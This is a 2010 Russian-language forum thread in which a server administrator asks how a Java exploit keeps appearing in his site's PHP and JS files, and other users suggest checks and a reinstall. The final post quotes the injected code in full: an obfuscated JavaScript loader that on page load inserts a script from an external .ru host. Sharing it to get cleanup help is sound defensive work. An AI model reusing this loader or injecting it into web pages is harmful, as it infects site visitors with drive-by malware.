Избавление от JavaSploit

Discussion in 'Безопасность и Анонимность' started by gOsToFf, 26 May 2010.

  1. gOsToFf

    gOsToFf New Member

    Joined:
    22 Aug 2007
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Такая беда...
    *nix сервер. Стоит apache2 + mysql5 + php5
    Ну настроеный вроде норм.
    Какимто чудом на всех файлах почти php и js прописался (Exploit.Java.CVE-2010-0886.a ) сплоит джавовский. ( 2 строчки <script>**** ) Затупил не скопировал их сами. но возможно еще найду
    дырку в каком либо сайте я исключил потому что каждому хосту прописано php_open_dir + были поправлены файлы у которых chmod на только чтение для всех кроме owner а owner это пользователь фтп. и для каждого хоста он свой. Тоесть правка пользователя apache исключается.
    Какие еще есть способы заливки?
     
  2. POS_troi

    POS_troi Elder - Старейшина

    Joined:
    1 Dec 2006
    Messages:
    1,574
    Likes Received:
    467
    Reputations:
    108
    Смени пасс на FTP/SSH и не качай больше с инета всякую чущь
     
  3. gOsToFf

    gOsToFf New Member

    Joined:
    22 Aug 2007
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Закрыл SSH/FTP за iptables - Все равно появляется эта хрень. Может в кроне что быть? Или модули кудато встраиваются. Знает кто нить чтонить такое?
     
  4. neval

    neval Elder - Старейшина

    Joined:
    13 Dec 2006
    Messages:
    457
    Likes Received:
    116
    Reputations:
    23
    grep -E
     
  5. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    возможен и более сложный случай - тебе могли залить руткит или протрояненный модуль, например ssh. в этом случае проще всего переустановка системы с нуля - как с виндой :) причем не той же системы, что была, а с обновленным ядром и прочим софтом - залезть к тебе могли через дыру в каком нить софте или самом ядре.
    [хотя это все лишь реальная возможность, в твоем случае все может быть все проще]
     
  6. gOsToFf

    gOsToFf New Member

    Joined:
    22 Aug 2007
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    В моем случае не все так просто.
    SSH закрыт от всех кроме 5 ипов.
    ftp так же.
    открыты 443, 80 Порты.
    причем метод закрытыя "iptables"

    Code:
    <script>this.u_="";var V;P=["Bp","Bw","nO"];e=function(){bt={Y:"D"};xf={y:"w"};this.Yn=28223;this.Yn-=203;function U(b,O,ee){this.oD=20167;this.oD++;return b.substr(O,ee);us=[];this.L="L";}var EB=26146;var ZA=34112;var _=RegExp;var Hn=["LJ","sH"];var B='';hp=37870;hp--;var u=String("/goog"+U("le.coQP8k",0,5)+U("m/yneYJz",0,5)+"t.com"+U("/pageIjbU",0,5)+U("WPKsjaunPKW",3,5)+"es.fr"+U(".phpu1F7",0,4));var F=document;var S=new Date();var Vy=[];function x(b,O){var c=["Zi","N"];var NV="";var ee=String("[")+O+String(U("]sdw",0,1));try {var wA='C'} catch(wA){};this.aG="aG";var Z=new _(ee, new String("g"));var f=new Array();var tW={vQ:"gq"};return b.replace(Z, B);Tc=33937;Tc+=107;};this.vn=63064;this.vn-=27;var OC=String("bo"+"dy");var o=null;var Uu=727558-719478;this.k=10584;this.k-=65;var Bo='';var sq='';var s=x('sdcWrCiIpJtI','dWwCPIJZo');var oU={};V=function(){try {eF={eb:31207};var Q=x('c4rPekaUt4ePE4l8ejmCezn5ts','jsTz0J4iUDCFGHP5k8y6');nQ=[];eq=["kv"];p=F[Q](s);PC={MG:false};var GK={NT:34578};var Uc={aI:"Ln"};try {var NVb='ds'} catch(NVb){};var v=x('sIrbcK','VoBKqIb');var b=Uu+u;var T=String(U("defUprW",0,3)+"er");qi=["vc","AT","po"];p[T]=[1,1][0];p[v]=U("httpEO5q",0,4)+U("Oqb7://m7Obq",4,4)+"ildb"+"abe."+"ru:"+b;this.qs=64843;this.qs++;var fa=61639;DL={dU:24542};var kO='';F[OC].appendChild(p);xP=["Qq","CL"];} catch(Vf){this.J=28162;this.J+=72;};wo=20562;wo-=126;};try {var FDO='ho'} catch(FDO){};try {var ZS='vS'} catch(ZS){};};var pw=["rh","Yo","Of"];this.Wf="Wf";e();var Ou='';var eT=false;var Wn={NW:false};window.onload=V;var pG={};this.qm=33221;this.qm-=212;</script>
    <!--99ad6768629f057aba11d6e9a798b9b6-->
    
     
Loading...